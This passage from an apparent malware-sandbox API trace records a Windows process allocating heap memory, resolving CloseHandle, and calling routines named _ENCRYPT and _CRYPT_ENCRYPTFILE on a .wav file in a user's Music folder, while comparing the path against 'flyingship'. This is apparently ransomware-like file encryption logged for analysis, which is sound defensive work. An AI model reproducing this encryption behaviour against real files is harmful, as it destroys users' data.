hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.537] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0187.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.537] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0187.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.537] CloseHandle (hObject=0x158) returned 1 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.538] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.539] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.539] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.539] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0187.539] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.539] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0187.539] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0187.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.552] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.552] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.552] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0x90add8 [0187.552] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.552] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0x90add8 [0187.553] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0187.553] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="01OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OknNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="knNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nNppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pjh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jh UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" UAhh.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.555] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.555] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.555] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.556] CompareStringW 